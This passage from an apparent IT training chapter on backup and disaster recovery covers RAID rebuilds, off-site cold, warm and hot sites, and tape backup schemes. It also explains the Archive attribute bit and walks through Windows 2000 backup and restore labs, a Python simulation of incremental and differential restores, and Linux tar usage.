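    lost = drives[1]
    drives[1] = None                 # simulate the drive failure
    drives[1] = rebuild(drives, 1)   # rebuild from the two survivors
    return drives[1] == lost and read_raid5(drives, 3).rstrip(b"\0") == data


if __name__ == "__main__":
    for level, n in (("0", 2), ("1", 2), ("5", 3), ("10", 4)):
        print(f"RAID {level:>2} on {n} disks: {efficiency(level, n):.0%} usable")
    print("rebuild ok:", demo())
```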

Hardware Options

So far, all of the backup strategies discussed are on the same site, maybe even on the same machine. What if the server room caught fire or was flooded, and all of the machines became inaccessible?

To counter this threat, you have to have off-site facilities. They are classified into three types of sites: cold sites, warm sites, and hot sites.

• Cold sites are simply working spaces with associated physical security, power outlets, telecommunications, and Internet connectivity. Recovery time at a cold site is typically over three days. This is the most affordable option, and depending on the provider, can cost around $2,000 per month for the average customer.

• Warm sites, in addition to everything provided for in a cold site, consist of mission-critical components, and are partially, but not completely, configured with equipment. For example, rack mounts may be physically present and electrically ready, with no servers mounted in them. Such a site is viable if the recovery time is allowed to be greater than half a day, but under a day or two. This is by far the most popular option. Pricing cannot be standardized here, as it can only be worked out after the organization and the provider have thoroughly discussed what constitutes a warm site.

• Hot sites are practically a working replica of your server and client configurations. This is the most expensive option, and as with warm sites, pricing cannot be standardized here. If disaster strikes, then depending on the remaining manpower available and the training provided to them, the company can be up and running at the hot site in a matter of hours. By the way, the military is trained to do this all the time. Of course, you cannot compare a regular company with the military, but there are occasions when even civilian establishments require such levels of discipline to keep from going out of business altogether.

Typically, an organization would not build and maintain its own cold, warm, or hot sites, but would instead purchase these services from another organization, such as Exodus (now Cable & Wireless PLC). If you visit www.cw.com, select your country, click the Products & Services link, then the Business Continuity & Recovery Services link, and finally the Facility Infrastructure Services link, you can read more about the various services offered by Cable & Wireless to set up such sites for your organization.

For further education in this aspect of your business, you can also visit the Institute for Business Continuity Training at www.ibct.com.

Backup Options

To recover from these kinds of disasters we need a different kind of backup—the kind that, at the end of the day, takes that day’s information off the server and puts it away on some external media, where it will not be changed until it is overwritten at some future date. Tape drives are by far the most popular backup media as they are, byte for byte, one of the cheapest forms of data storage. Most of these tapes currently retail for around $70 per 100 GB of storage (that’s $0.70 per GB), and the prices continue to fall. At standard 2:1 compression rates, this brings the price down to $0.35 per GB. The only issue is speed. Data transfer rates are in the region of 20 MB/sec. That means filling such a tape to capacity will take a little under 3 hours.

In large data-storage centers that are performing normal backups daily, vast amounts of information would have to be backed up, and the tape drives would have to run almost incessantly. Therefore, alternative tape-backup solutions exist, whereby once a full backup is prepared, subsequent backups do not need to be backed up byte for byte. Rather, just the data that changed since that full backup was performed needs to be backed up. This is known as a differential backup. If this method gets to be too demanding on tape capacity, then subsequent backups can simply back up data that changed since the last backup. This is known as an incremental backup.


Figure 6-8: Comparing normal, differential, and incremental backups.

Take a look at Figure 6-8. This explains all three methods of backup. The typical backup cycle is run on a weekly basis. Notice that the normal backup begins over the weekend, when there is sufficient time to do a full, normal backup of the system. If this is a small business and all of the information fits on one tape, then a normal backup can be done every day.

In some instances (normal and differential backups), tapes can theoretically be reused without affecting restoration capabilities (the curved arrows connecting Weekend with Tuesday, Monday with Wednesday, and Tuesday with Thursday). Therefore, if you’re performing a normal backup, the weekend tape can be reused on Tuesday night, because Monday night’s tape holds all of the current information. Monday night’s tape can be reused on Wednesday night, while Tuesday’s tape can come back on Thursday.

This is an oversimplified tape-swapping operation—in reality, one tape should always remain away from the server and the other backup tapes to protect against disaster, for instance, a fire in the server room. Large organizations will not swap tapes on alternate days. Rather, they will maintain entire sets of weekly tapes. If they have to swap tapes, it will be from tape sets belonging from a few weeks or even a few months ago, depending on the quality-control requirements. Eventually tapes are retired (usually after a year or so), and one of the sets representing that year makes it to a long-term storage facility somewhere for recordkeeping purposes.

Common terminologies that you will hear regarding tape reuse are the Grandfather-Father-Son (GFS) scheme and the Tower of Hanoi scheme. To learn more about these schemes, you can read an excellent article on Exabyte’s Web site, found at www.exabyte.com/support/online/documentation/whitepapers/basicbackup.pdf.


When you employ the normal backup routine, restoration is extremely easy. All you need is the last backup. For example, if you need to restore from backup on Thursday, all you need is Wednesday night’s tape set.

The differential backup sequence begins like a normal backup sequence does. Over the weekend, a complete, normal backup is created. On Monday night, only those files that were changed on Monday are backed up. Notice that there’s not much to back up on Monday. On Tuesday night, only the files that were changed on Monday and Tuesday are backed up. As the week progresses, the amount of data that needs to be backed up continues to grow. However, tapes can still be recycled within the week, as shown.

With a differential backup scheme, if you need to restore from backup on Thursday, you need the weekend tape set and Wednesday night’s tapes.

The incremental backup sequence begins like a differential backup sequence. Over the weekend, a complete, normal backup is created. On Monday night, only the files that were changed on Monday are backed up. Notice again that there’s not much to back up on Monday. On Tuesday night, only the files that were changed on Tuesday are backed up, and so on. With this method of backup, tapes cannot be recycled during the week, as shown.

With an incremental backup scheme, if you need to restore from backup on Thursday, you need the weekend tape set and Monday, Tuesday, and Wednesday night’s tapes, so you have to be careful how you label and store these tapes, as the tapes cannot be out of sequence at any time.

How does the system decide what files to back up and what to ignore during the differential and incremental backup cycles? The answer lies in the Archive attribute bit. Apart from having a filename, parent directory, date created/modified, and other identifying criteria, every file on your hard drive has eight bits that signify certain things to the OS, such as if the file is Read-Only, a System file, and so forth. These eight bits are known as the Attribute byte.

The table shown in Figure 6-9 describes the bit positions of the Attribute byte.

Figure 6-9: The Attribute byte.

The purpose of the Archive bit is as follows: If this bit is ON, then the corresponding file has never been backed up (archived), or it has changed since the last backup. If this bit is OFF, then the file does not need to be backed up, as it has not changed since the last time it was archived. In other words, if you back up a file by using archiving software, then the archiving software will turn the Archive bit off. When you use some application to modify that file, the moment you modify it, its Archive bit is turned back on again.

When you perform a normal backup, all of the files that you have selected for backup will be backed up, and their respective Archive bits will be turned off.

When you perform a differential backup, the backup software looks for only those files that have their Archive bits turned back on again, because some application opened, modified, and then saved those files. The archiving software will select only those files for backing up. However, during a differential backup, the archiving software will not set the Archive bit to the off position. Why is this? Because, according to the requirements, the baseline is set for the first normal backup. After the normal backup, all files that were modified will have their Archive bit set to on, and it will remain on even after the archiving software has archived them, to preserve the baseline from the normal backup.

When you perform an incremental backup, the backup software looks for only those files that have their Archive bits turned back on again, because some application opened, modified, and then saved those files. The archiving software will select only those files for backing up. During an incremental backup, the archiving software does set the Archive bit to the off position. Why? Because, according to the requirements, the baseline is set for each day. Every day is the baseline for the next day.

Backup Strategies for Windows Computers

Most operating systems have some backup and restore software included with them. In Windows 2000, ntbackup.exe can be run as both a command-line tool and as a GUI. This tool enables you to back up the entire system, portions of the system, or individual files to many media formats, including your own hard drive, to another hard drive, somewhere else on the network, to a tape drive, or even to a floppy disk. You are no longer constrained to using only a tape drive, as you were in Windows NT 4.

Current Products that Can be Used for Backup

Of course, you can purchase a third-party solution from companies such as Veritas (BackupExec), Seagate (Dantz), or Exabyte, which are typically used when higher-end backup solutions are needed. If you do, you will have to use their software to perform backups. Let’s take a look at the built-in solution for backups provided for you in Windows 2000.

TASK 6D-1
Creating a Folder Structure

Objective: To create files and folders to be used in testing the backup solutions provided in the Windows 2000 OS.

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open Windows Explorer.

2. Select your boot partition.

3. Create a folder called BackReco.

4. In this folder, create three folders named Normal, Differential, and Incremental.

5. In the Normal folder, create two folders named Backup1 and Restore1.

6. In the Differential folder, create two folders named Backup2 and Restore2.

7. In the Incremental folder, create two folders named Backup3 and Restore3. Navigate to the BackReco\Normal\Backup1 folder.

8. Right-click anywhere within the Explorer window, and choose New→Text Document.

9. Rename the file normal.txt.

10. Observe that the file was created with the Archive attribute bit set.

Record the file modification time here: Actual times will vary for each class.

11. Double-click the file, enter any text that you like, and save and close the file.

12. Leave this Explorer window open.

Initiating the Backup Process

In the following task, you will perform the steps necessary to back up the file that you just created. To start, you will initiate a normal backup.

TASK 6D-2
Initiating a Normal Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Explorer is running.

1. From the Start menu, choose Programs→Accessories→System Tools→Backup to start the Backup utility. You might want to create a shortcut to this utility on your Desktop so that you don’t have to go through the menus in future tasks.

2. Select the Backup tab. Expand your boot partition, and navigate to the BackReco\Normal\Backup1 folder.

3. In the right pane, check the file name of the file you just created.

4. Towards the bottom of this window, where it says Backup Destination (File) and Backup Media Or File Name: a:\backup.bkf, click the Browse button, and navigate to the BackReco\Normal\Restore1 folder.

5. Name your backup file abc, and click Open.

6. Towards the right side of the backup window, click Start Backup.

7. Click the Advanced button. Verify that the Backup Type is set to Normal. Click OK.

8. Click the Schedule button. The first time you click this button, you will be prompted to save your settings. Do so with any name you like, and enter your logon credentials if you are prompted for them. The Scheduled Job Options dialog box is displayed.

9. Click Properties. If you want to schedule this job for later as a one-off job or for repetitive backups on a daily, weekly, or monthly schedule, this is where you enter the options.

10. Click Cancel twice.

11. Click Start Backup. A few seconds later your backup should be complete.

12. Click Close, and minimize the Backup utility.

Viewing the Results of the Backup Process

Now that you have performed a normal backup, in the following task, you will check out the state of the Archive bit.

TASK 6D-3
Viewing the State of the Archive Attribute Bit

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Explorer window.

2. Verify that the file does not have the Archive attribute bit set.

3. Double-click the file to open it in Notepad.

4. Enter any extra text you like.

5. Save and close the file, and switch back to the Explorer window.

6. Observe that the Archive bit is now back on again. This means that the file has changed since the last backup and needs to be archived again. Also, observe that the file modification time has changed.

Restoring a File from Normal Backup

Let’s look at a scenario where we consider the last edit of the file to be a wrong edit; perhaps somebody tampered with the file or didn’t know what they were doing, so you now have to restore the original file from backup.

TASK 6D-4
Restoring from a Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility.

2. Select the Restore tab. If the Restore tab contains text that indicates that existing files will not be replaced, choose Tools→Options, select Always Replace The File On My Computer, and click OK.

3. Expand the elements in the left pane until you can see your text file in the right pane, and then check your text file.

4. Click the Start Restore button. If you are prompted to confirm the restore, click OK.

5. In the Enter Backup File Name text box, verify the path to your backup file, and click OK.

6. Give Backup a few seconds to do its job. Your file should be restored for you. Click Close and minimize Backup.

7. Switch to the Explorer window and observe the file modification time. It has reverted to the time that you recorded when you first backed up the file.

8. Open your text file in Notepad.

9. Verify that the changes you had made are now gone and that the file is in its original state.

10. Close Notepad.

Understanding Differential Backup

In the following set of tasks, you will carefully construct and step through the requirements to initiate a differential backup and restore of a set of files. You will create separate backup files to mimic each day of backup. You will then mimic an accident by deleting all of the files in your folder. Finally, you will use the Restore feature to retrieve the deleted files.

TASK 6D-5
Preparing to Start a Differential Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. In Explorer, navigate to the BackReco\Differential\Backup2 folder.

2. Expand your screen so that you can see all the columns. Add the Attributes column if it isn’t displayed.

3. Right-click in the Explorer window, and choose New→Text Document.

4. Rename this file Weekend.txt.

5. As before, observe that the file was created with the Archive attribute bit set.

Record the file modification time: Modification times will vary.

6. Double-click the file, enter Last week’s work, and then save and close the file.

7. Leave this Explorer window open.

Backing Up Your Weekend’s Work

In the following task, you will perform the steps necessary to back up your weekend’s work.

TASK 6D-6
Initiating a Differential Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility, and select the Backup tab.

2. Choose Tools→Options.

3. Under Default Backup Type, verify that Normal is selected, and click OK. When you are going to be performing a differential backup, you first perform a Normal backup.

4. In the left pane, navigate to the BackReco\Differential\Backup2 folder.

5. Check the folder.

6. Click the Browse button to specify the location of the backup media or file name.

7. Navigate to the BackReco\Differential\Restore2 folder.

8. For the file name, enter Weekend_normal, and click Open.

9. Click Start Backup, then click Start Backup again.

10. Wait a few seconds. When the backup is complete, click Close.

11. Close the Backup utility.

Adding Data During the Week

In the following task, you will proceed to add to the work that you did last week, after backing up your weekend’s work.

TASK 6D-7
Creating Additional Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer is running.

1. Switch to Windows Explorer and select the BackReco\Differential\Backup2 folder.

2. As you had seen earlier, observe that the file Weekend.txt no longer has the Archive attribute bit set.

3. Right-click in the Explorer window and choose New→Text Document.

4. Rename this file Monday.txt.

5. As before, observe that the file was created with the Archive attribute bit set.

Record the file modification time here: Actual times will vary for each class.

6. Double-click the file, enter Monday’s work, and then save and close the file.

7. Leave this Explorer window open.

Backing Up Data During the Week

In the following task, you will perform the steps necessary to differentially back up the work you did after backing up your weekend’s work.

TASK 6D-8
Continuing the Differential Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer is running.

1. Start the Backup utility.

2. Select the Backup tab.

3. Choose Tools→Options.

4. Under Default Backup Type, select Differential, and click OK.

5. In the left pane, navigate to the BackReco\Differential\Backup2 folder.

6. Check the folder.

7. Click the Browse button to specify the location of the backup media or file name.

8. Navigate to the BackReco\Differential\Restore2 folder.

9. For the filename, enter Mon_diff, and click Open. This now represents the follow-up to the normal backup you carried out earlier.

10. Click Start Backup, and then click Start Backup again.

11. When the backup is complete, click Close.

12. Minimize the Backup utility.

Adding More Data

In the following task, you will perform the steps necessary to add more work after performing your first differential backup.

TASK 6D-9
Adding Data After a Differential Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.

2. Observe that the Archive attribute bit for the file Monday.txt is still on. When you chose to do a differential backup, the file was backed up, but the Archive attribute bit was not touched.

3. Create a new text document named Tuesday.txt.

4. As before, observe that the file was created with the Archive attribute bit set.

Record the file modification time: Modification times will vary.

5. Double-click the file, enter Tuesday’s work, and then save and close the file.

6. Leave this Explorer window open.

Backing Up More Data

In the following task, you will perform the steps necessary to back up the work you did after backing up your previous day’s work.

TASK 6D-10
Differentially Backing Up More Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility.

2. Choose Tools→Options.

3. Under Default Backup Type, verify that Differential is selected, and click OK.

4. In the left pane, navigate to the BackReco\Differential\Backup2 folder, and check the folder.

5. Browse to specify the BackReco\Differential\Restore2 folder as the location of the backup media or file name.

6. For the file name, enter Tue_diff, and click Open.

7. Start the backup (click Start Backup, and then click Start Backup again).

8. When the backup is complete, click Close.

9. Minimize the Backup utility.

Accidentally Deleting Data

In the following task, you will mimic an accidental destruction of all of the work you did this week, as well as last week’s work.

TASK 6D-11
Destroying Backed-up Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.

2. Observe that the Archive Attribute bit for the file Tuesday.txt is still on.

3. Delete all of the files in the Backup2 folder.

4. Leave this Explorer window open.

Restoring Data from a Differential Backup

In the following task, you will use your backup files to restore all of the work you did this week and last week.

TASK 6D-12
Restoring Files from a Differential Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility.

2. Select the Restore tab.

3. If you see some Media files, select all of them in the right pane, and choose Tools→Media Tools→Delete Catalog.

4. Choose Tools→Catalog A Backup File.

5. Browse to the BackReco\Differential\Restore2 folder, and select Weekend_normal.bkf. Click Open, and then click OK.

6. In the left pane, expand File (the one with the CD-ROM icon) and the full path under Media Created On File (the one with the floppy disk icon) below it.

7. If a pop-up is displayed, verify that the file listed is the Weekend_normal.bkf file, and click OK.

8. Check the Backup2 folder.

9. Click the Start Restore button.

10. Click OK twice.

11. When the restore is complete, click Close.

12. Minimize the Backup utility.

13. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.

14. Observe that the Weekend.txt file is restored. But, you need to have this week’s work, too!

15. Switch to the Backup utility.

16. On the Restore tab, select the Media file, and choose Tools→Media Tools→Delete Catalog.

17. Choose Tools→Catalog A Backup File.

18. Browse to the BackReco\Differential\Restore2 folder, and select Tue_diff.bkf.

19. In the left pane, expand File and the full path under the Media Created On File below it.

Each time that you are prompted for the location of the file, verify that the file listed is the Tue_diff.bkf file, and click OK.

20. Check the Backup2 folder.

21. Start the restore.

22. Click OK twice.

23. When the restore is complete, click Close.

24. Minimize the Backup utility.

25. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.

26. Observe that both the Monday.txt and Tuesday.txt files have been restored.

Optional Tasks

The previous set of tasks was designed to walk you through the process of backing up and restoring a set of files by using the differential backup method. The set of tasks that follows is optional and is designed to help you understand the steps required to achieve the same objective, this time by using the incremental backup method. Because we are using very small files to illustrate the process, it may seem that there’s not much difference between the two in terms of time taken to back up and restore. In the real world, when faced with the choice of backing up large amounts of data every day, there can sometimes be an order of magnitude in the difference between adopting one method over the other.

Understanding Incremental Backup

In the following set of tasks, you will carefully construct and step through the requirements to initiate an incremental backup and restore of a set of files. You will create separate backup files to mimic each day of backup. You will then mimic the accidental destruction of data by corrupting a file and by deleting all of the files in your folder. You will then use the Restore feature to retrieve the necessary files.

OPTIONAL TASK 6D-13
Preparing to Start an Incremental Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Navigate to the BackReco\Incremental\Backup3 folder.

2. Expand your screen so that you can see all of the columns.

3. Create a new text document named Weekend.txt.

4. As before, observe that the file was created with the Archive attribute bit set.

Record the file modification time: Modification times will vary.

5. Double-click the file, enter Last week’s work, and then save and close the file.

6. Leave this Explorer window open.

Backing up Your Weekend’s Work

In the following task, you will perform the steps necessary to back up your weekend’s work.

OPTIONAL TASK 6D-14
Initiating an Incremental Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility, and select the Backup tab.

2. Choose Tools→Options.

3. Under Default Backup Type, select Normal, and click OK. When you are going to be performing an incremental backup, you first perform a normal backup.

4. In the left pane, navigate to the BackReco\Incremental\Backup3 folder.

5. Check the folder.

6. Browse to specify BackReco\Incremental\Restore3 as the location of the backup media or file name.

7. For the file name, enter Weekend_normal, and click Open.

8. Start the backup.

9. When the backup is complete, click Close.

10. Minimize the Backup utility.

Adding Data During the Week

In the following task, you will proceed to add to the work you did last week.

OPTIONAL TASK 6D-15
Creating Additional Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

2. As you had seen earlier, observe that the file Weekend.txt no longer has the Archive attribute bit set.

3. Create a new text document named Monday.txt.

4. As before, observe that the file was created with the Archive attribute bit set.

Record the file modification time: Modification times will vary.

5. Double-click the file, enter Monday’s work, and then save and close the file.

6. Leave this Explorer window open.

Backing Up Data During the Week

In the following task, you will perform the steps necessary to incrementally back up the work you did after backing up your weekend’s work.

OPTIONAL TASK 6D-16
Continuing the Incremental Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility, and verify that the Backup tab is active.

2. Choose Tools→Options.

3. Under Default Backup Type, select Incremental, and click OK.

4. In the left pane, navigate to the BackReco\Incremental\Backup3 folder.

5. Check the folder.

6. Browse to specify BackReco\Incremental\Restore3 as the location of the backup media or file name.

7. For the file name, enter Mon_incr, and click Open. This now represents the follow-up to the normal backup you carried out earlier.

8. Start the backup.

9. When the backup is complete, click Close.

10. Minimize the Backup utility.

Adding More Data

In the following task, you will perform the steps necessary to add more work after performing your first incremental backup.

OPTIONAL TASK 6D-17
Adding Data After an Incremental Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

2. Observe that the Archive attribute bit for the file Monday.txt is now off. When you chose to do an incremental backup, the file was backed up and the Archive attribute bit was set to 0.

3. Create a new text document named Tuesday.txt.

4. As before, observe that the file was created with the Archive attribute bit set.

Record the file modification time: Modification times will vary.

5. Double-click the file, enter Tuesday’s work, then save and close the file.

6. Leave this Explorer window open.

Backing Up More Data

In the following task, you will perform the steps necessary to incrementally back up the work you did after backing up your previous day’s work.

OPTIONAL TASK 6D-18
Incrementally Backing Up More Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility.

2. Verify that the Incremental Backup option is selected, and click OK.

3. In the left pane, navigate to the BackReco\Incremental\Backup3 folder.

4. Check the folder.

5. Browse to specify BackReco\Incremental\Restore3 as the location of the backup media or file name.

6. For the filename, enter Tue_incr, and click Open.

7. Start the backup.

8. When the backup is complete, click Close.

9. Minimize the Backup utility.

Accidentally Corrupting Data

In the following task, you will simulate a situation where someone trashes a file by replacing it with unwanted text.

OPTIONAL TASK 6D-19
Corrupting Backed-up Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

2. Observe that the Archive attribute bit for the file Tuesday.txt is off.

3. Open Monday.txt.

4. Delete the existing text. Add some gibberish, and save and close the file.

5. Observe that the Archive bit is back on again for Monday.txt.

6. Leave this Explorer window open.

Restoring Data from an Incremental Backup

In the following task, you will use your backup files to restore just the work that was messed up, not all of the data.

OPTIONAL TASK 6D-20
Restoring an Incrementally Backed-up File

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility.

2. Select the Restore tab.

3. If you see some media files, delete the catalog.

4. Choose Tools→Catalog A Backup File.

5. Browse to and open \BackReco\Incremental\Restore3\Mon_incr.bkf.

6. In the left pane, expand File and the full path under the Media Created On File below it (verifying the file location as you expand).

7. Check the Backup3 folder.

8. Start the restore.

9. Click OK twice.

10. When the restore is complete, click Close.

11. Minimize the Backup utility.

12. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

13. Open Monday.txt, and verify that it has been properly restored.

14. Close Notepad.

Performing an Incomplete Restore from Incremental Backup

In the following task, you will mimic the accidental destruction of all the work you did this week and last week. You will then incorrectly try to restore all the work you lost. This will help you understand the right way of implementing a restore from incremental backup.

OPTIONAL TASK 6D-21
Incompletely Restoring from Incremental Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Highlight all three text files in the Backup3 folder, and delete them.

2. Leave this Explorer window open.

3. Switch to the Backup utility.

4. On the Restore tab, if you see some media files, delete the catalog.

5. Choose Tools→Catalog A Backup File.

6. Browse to and open \BackReco\Incremental\Restore3\Weekend_normal.bkf.

7. In the left pane, expand File and the full path under the Media Created On File below it.

8. Check the Backup3 folder.

9. Start the restore.

10. Click OK twice.

11. When the restore is complete, click Close.

12. Minimize the Backup utility.

13. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

14. Verify that the Weekend.txt file has been restored.

15. Switch to the Backup utility.

16. On the Restore tab, delete the existing media catalog.

17. Catalog the Tue_incr.bkf backup file.

18. In the left pane, expand File and the full path under the Media Created On File below it.

19. Check the Backup3 folder.

20. Start the restore.

21. Click OK twice.

22. When the restore is complete, click Close.

23. Minimize the Backup utility.

24. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

25. Observe that only the Tuesday.txt file was restored. The Monday.txt file is still missing.

Analyzing the Incremental Restore

What happened just now? When choosing to restore from an incremental backup set, in order to fully restore all of the files, you must start with the first (normal) backup and then proceed to restore from every subsequent incremental archive.

OPTIONAL TASK 6D-22
Completely Restoring from Incremental Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Highlight the two text files in this folder, and delete them.

2. Leave this Explorer window open.

3. Switch to the Backup utility.

4. Delete the media catalog, catalog the Weekend_normal.bkf file, and restore from that file.

5. In Explorer, verify that the Weekend.txt file has been restored.

6. In the Backup utility, delete the media catalog, catalog the Mon_incr.bkf backup file, and restore from that file.

7. In Explorer, verify that the Monday.txt file has been restored.

8. In the Backup utility, delete the media catalog, catalog the Tue_incr.bkf backup file, and restore from that file.

9. Close the Backup utility.

10. In Explorer, verify that the Tuesday.txt file has been restored. You now have correctly restored all of the files from the incremental backup set.

11. Close Explorer.
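The Archive-bit rules from the Attribute byte discussion earlier in this lesson, and the restore order that Optional Tasks 6D-21 and 6D-22 just demonstrated, modelled as a small Python simulation. This is an added example, not course material and not ntbackup code; the Volume, BackupSet, sets_needed, run_week and incomplete_vs_complete_restore names are the example's own, the file names and contents are constructed to match the tasks, and one detail the lesson does not state is assumed: a restored file is written back as if freshly edited, so its Archive bit comes back on.

```python
"""Model of the Archive attribute bit as normal, differential and
incremental backups use it, plus the order in which backup sets must be
restored. Added illustration; all names here are the example's own."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class File:
    content: str
    archive: bool = True  # creating or modifying a file turns the Archive bit ON


@dataclass
class BackupSet:
    label: str
    kind: str  # "normal", "differential" or "incremental"
    snapshot: Dict[str, str] = field(default_factory=dict)


class Volume:
    """A folder of files, each carrying one Archive attribute bit."""

    def __init__(self) -> None:
        self.files: Dict[str, File] = {}

    def write(self, name: str, content: str) -> None:
        self.files[name] = File(content, archive=True)

    def backup(self, label: str, kind: str) -> BackupSet:
        if kind == "normal":
            selected = list(self.files.items())  # everything, bit or no bit
        elif kind in ("differential", "incremental"):
            selected = [(n, f) for n, f in self.files.items() if f.archive]
        else:
            raise ValueError(f"unknown backup type: {kind}")
        bset = BackupSet(label, kind, {n: f.content for n, f in selected})
        # Normal and incremental backups clear the bit on what they copied.
        # Differential leaves it on, so the baseline stays the last normal backup.
        if kind != "differential":
            for _, f in selected:
                f.archive = False
        return bset

    def restore(self, sets: List[BackupSet]) -> None:
        # Assumption: a restore writes files back like a fresh edit (bit ON).
        for s in sets:
            for name, content in s.snapshot.items():
                self.write(name, content)


def sets_needed(history: List[BackupSet]) -> List[str]:
    """Labels of the sets required to recover to the latest backup, in restore order."""
    last_normal = max(i for i, s in enumerate(history) if s.kind == "normal")
    later = history[last_normal + 1:]
    needed = [history[last_normal]]
    incrementals = [s for s in later if s.kind == "incremental"]
    differentials = [s for s in later if s.kind == "differential"]
    if incrementals:
        needed += incrementals            # every one of them, oldest first
    elif differentials:
        needed.append(differentials[-1])  # only the most recent one
    return [s.label for s in needed]


def run_week(kind: str) -> dict:
    """Weekend normal backup, then one backup of `kind` each weekday (constructed data)."""
    vol = Volume()
    vol.write("Weekend.txt", "Last week's work")
    history = [vol.backup("Weekend_normal", "normal")]
    for day in ("Monday", "Tuesday", "Wednesday"):
        vol.write(f"{day}.txt", f"{day}'s work")
        history.append(vol.backup(f"{day[:3]}_{kind[:4]}", kind))
    return {
        "sets": {s.label: sorted(s.snapshot) for s in history},
        "archive_bits": {n: f.archive for n, f in vol.files.items()},
        "needed": sets_needed(history),
    }


def incomplete_vs_complete_restore() -> Tuple[List[str], List[str]]:
    """Optional Tasks 6D-21 and 6D-22: skipping Mon_incr loses Monday.txt."""
    vol = Volume()
    vol.write("Weekend.txt", "Last week's work")
    history = [vol.backup("Weekend_normal", "normal")]
    for day in ("Monday", "Tuesday"):
        vol.write(f"{day}.txt", f"{day}'s work")
        history.append(vol.backup(f"{day[:3]}_incr", "incremental"))
    vol.files.clear()                       # the "accident"
    vol.restore([history[0], history[2]])   # Weekend_normal, then Tue_incr only
    partial = sorted(vol.files)
    vol.files.clear()
    vol.restore(history)                    # Weekend_normal, Mon_incr, Tue_incr
    return partial, sorted(vol.files)


if __name__ == "__main__":
    for kind in ("normal", "differential", "incremental"):
        print(kind, run_week(kind))
    print(incomplete_vs_complete_restore())
```

run_week("differential") reports Tue_diff holding both Monday.txt and Tuesday.txt with their Archive bits still on, and only Weekend_normal plus the latest differential set needed for a restore; run_week("incremental") reports one file per set, every bit cleared, and every incremental set needed, in order. incomplete_vs_complete_restore() reproduces the missing Monday.txt of Task 6D-21 and the full recovery of Task 6D-22.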

Backup Options for Linux Computers

Strategies for backing up in Linux are the same as with any other OS; you still choose between normal, differential, or incremental backups. Most administrators would still use home-grown solutions based on tar or cpio to back up their files, as these facilities are built in to the OS.

Some third-party and commercial utilities available for Linux include:

• Lone Tar (from www.cactus.com)

• Afbackup (from http://sourceforge.net/projects/afbackup)

• Arkeia (from www.arkeia.com), an enterprise backup system. Incidentally, while Arkeia for the enterprise has a price tag to it, Arkeia-Lite for one Linux server with two clients is free.

• Amanda (from www.amanda.org), a comprehensive network backup system. The Advanced Maryland Automatic Network Disk Archiver, as the name implies, was developed at the University of Maryland. AMANDA can be used as a network backup system. It enables a LAN administrator to set up a server as a master backup server. Using this server, the administrator can back up multiple hosts to a single large-capacity tape drive. AMANDA uses the native dump and/or GNU tar facilities to back up many workstations on the network even if they run different versions of Unix or Linux. The new versions of AMANDA can also use SAMBA to back up Windows workstations.

Current Products that Can be Used for Backup

The name of the GNU tar utility is an abbreviation of Tape Archive; tar is the traditional way Unix machines create archives on tape as a backup and recovery mechanism. When you back up to a device, you specify the device by name, such as:

• Floppy disk: /dev/fd0

• SCSI tape drive: /dev/st0

Let's say you wanted to back up some files (file1, file2, and file3) to a floppy disk. If the files are larger than a single floppy, you want the archiving software to span the archive across multiple floppies. In this case, you would use the tar command as follows:

tar -cMf /dev/fd0 file1 file2 file3

If you read the man pages for tar, you will see that the switches work as follows:

• -c = create an archive

• -M = multi-volume (tar prompts for the next floppy when the current one is full)

• -f = the archive file or device; it takes the next word on the command line as its argument, so it must be the last letter in a cluster of switches (-cMf, not -cfM, which would try to create an archive whose name is the rest of the cluster)

Note that GNU tar refuses to combine -z (filter the archive through gzip) with -M: a multi-volume archive cannot be compressed on the fly, so either compress the files beforehand or leave the archive uncompressed.

